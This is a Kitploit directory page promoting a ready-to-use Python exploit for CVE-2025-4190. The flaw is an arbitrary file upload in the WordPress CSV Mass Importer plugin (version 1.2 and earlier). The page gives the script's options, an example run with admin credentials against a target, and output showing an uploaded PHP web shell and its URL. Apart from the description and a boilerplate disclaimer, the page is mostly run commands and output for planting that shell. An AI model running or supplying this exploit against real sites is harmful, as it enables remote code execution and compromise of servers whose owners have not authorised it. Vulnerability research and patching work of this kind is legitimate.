Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-4190 — CSV Mass Importer <= 1.2 - Admin+ Arbitrary File Upload | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-4190
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubnxploited/cve-2025-4190

CVE-2025-4190

CSV Mass Importer <= 1.2 - Admin+ Arbitrary File Upload

View Repository
31 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-4190 — WordPress CSV Mass Importer ≤ 1.2 Arbitrary File Upload

WordPress Plugin
CVE
Status
Author


📌 Description

The CSV Mass Importer plugin (≤ 1.2) for WordPress contains an Admin+ Arbitrary File Upload vulnerability.
Due to improper validation of uploaded files, high-privilege users (such as admin) can upload arbitrary files on the server, even when this should be restricted — for example in multisite setups.

This vulnerability allows an attacker to upload PHP shells or malicious files, leading to remote code execution (RCE) on the server.

Discovered by Nxploited (Khaled Alenazi).


🔥 Details

  • Plugin Name: CSV Mass Importer
  • Affected Version: ≤ 1.2
  • Vulnerability Type: Admin+ Arbitrary File Upload
  • CVE: CVE-2025-4190
Download Tool
  • WPVDB ID: e525ece5-6e03-4aee-bf5b-6ae0b961f027
  • Original Researcher: Khaled Alenazi (Nxploited)
  • Submitter Website: https://github.com/Nxploited
  • Verified: ✅

  • 💻 Proof of Concept (PoC)

    The plugin fails to properly check uploaded files when using the CSV import feature.
    A crafted ZIP file containing a PHP shell can be uploaded and extracted to a publicly accessible directory.

    Shell Path Example:

    root@kitploit:~
    <target-url>/wp-content/uploads/cmi-data/nxploited.php
    

    🚀 Usage

    Script

    This repository contains a ready Python exploit script: 4190.py

    Help Menu

    root@kitploit:~
    python CVE-2025-4190.py --help
    usage: 4190.py [-h] --url URL --username USERNAME --password PASSWORD
    
    WordPress CSV Mass Importer <= 1.2 - Admin+ Arbitrary File Upload # By Nxploited (Khaled Alenazi)
    
    options:
      -h, --help            show this help message and exit
      --url, -u URL         Target WordPress site URL
      --username, -un USERNAME
                            WordPress admin username
      --password, -p PASSWORD
                            WordPress admin password
    

    Example Run

    root@kitploit:~
    python CVE-2025-4190.py -u http://192.168.100.74:888/wordpress -un admin -p admin
    

    Expected Output

    root@kitploit:~
    [+] Logged in successfully.
    [+] Payload 'nxploited.zip' created successfully.
    [+] Payload uploaded successfully.
    [+] Shell URL: http://192.168.100.74:888/wordpress/wp-content/uploads/cmi-data/nxploited.php
    Exploited By Nxploited (Khaled_alenazi)
    

    🕰 Timeline

    • Publicly Published: 2025-04-26 (about 11 days ago)
    • Added to Database: 2025-05-07 (about 1 hour ago)
    • Last Updated: 2025-05-07 (about 1 hour ago)

    🛡 References

    • CVE-2025-4190 on WPScan

    ⚠ Disclaimer

    This code is provided for educational purposes only.
    The author is not responsible for any misuse or damage caused by this script.
    Use responsibly and only on systems you are authorized to test.


    Discovered and developed by Khaled Alenazi (Nxploited) 🌟